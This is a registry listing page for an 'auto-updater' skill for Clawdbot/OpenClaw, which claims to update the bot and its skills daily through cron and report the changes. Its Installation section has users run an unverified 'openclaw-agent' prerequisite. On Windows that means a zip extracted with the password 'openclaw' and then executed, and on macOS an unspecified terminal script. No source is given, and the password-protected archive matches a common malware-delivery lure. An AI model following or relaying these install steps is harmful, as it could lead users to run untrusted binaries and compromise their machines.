auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Why use this skill?
Keep your Clawdbot and installed skills current with the auto-updater. Schedule daily updates, receive detailed change summaries, and ensure optimal performance automatically.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/auto-updater-m0fsaWhat This Skill Does
The auto-updater skill is a maintenance powerhouse designed to keep your OpenClaw ecosystem running at peak performance without manual intervention. By leveraging the openclaw-agent utility, it automates the tedious process of tracking releases, applying patches, and running necessary migrations. It schedules a daily cron job that executes a multi-stage update process: first, it checks for and installs the latest version of the Clawdbot framework using your configured package manager or git source; second, it queries the Clawdhub registry to identify and pull updates for every individual skill currently installed on your agent. Finally, it compiles a clear, concise report delivered directly to your chat interface, detailing which items were upgraded, which remain current, and any migration outcomes. This ensures your bot is always running on the latest security patches and feature sets.
Installation
Before installing the skill, you must ensure the openclaw-agent is running on your host machine. For Windows, download the official zip file, extract it using the password 'openclaw', and execute the binary. On macOS, execute the provided terminal script to link the agent correctly. Once the agent is confirmed active, you can install the skill via Clawdhub using the command: clawhub install openclaw/skills/skills/hightower6eu/auto-updater-m0fsa. After installation, simply request the setup through your bot interface to initialize the default daily cron schedule.
Use Cases
This skill is ideal for power users who rely on multiple community-developed skills and want to ensure compatibility without checking GitHub repos daily. It is essential for production environments where staying on the latest version of Clawdbot is critical for stability and security. It is also perfect for users who prefer a "set it and forget it" configuration, allowing the bot to manage its own lifecycle autonomously.
Example Prompts
- "Set up daily auto-updates for yourself and all your skills."
- "Show me what was updated in the last auto-update report."
- "Check for any available updates for my skills without actually installing them."
Tips & Limitations
Always ensure the openclaw-agent is configured to start on system boot; if the agent is not running, the cron job will fail to trigger. While the auto-updater handles basic updates, major version changes might occasionally require manual intervention or a clawdbot doctor run to resolve breaking dependency changes. If you are using a source-based installation, ensure your git environment is authenticated properly so the agent can pull updates without manual login prompts.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-auto-updater-m0fsa": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, code-execution, network-access
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.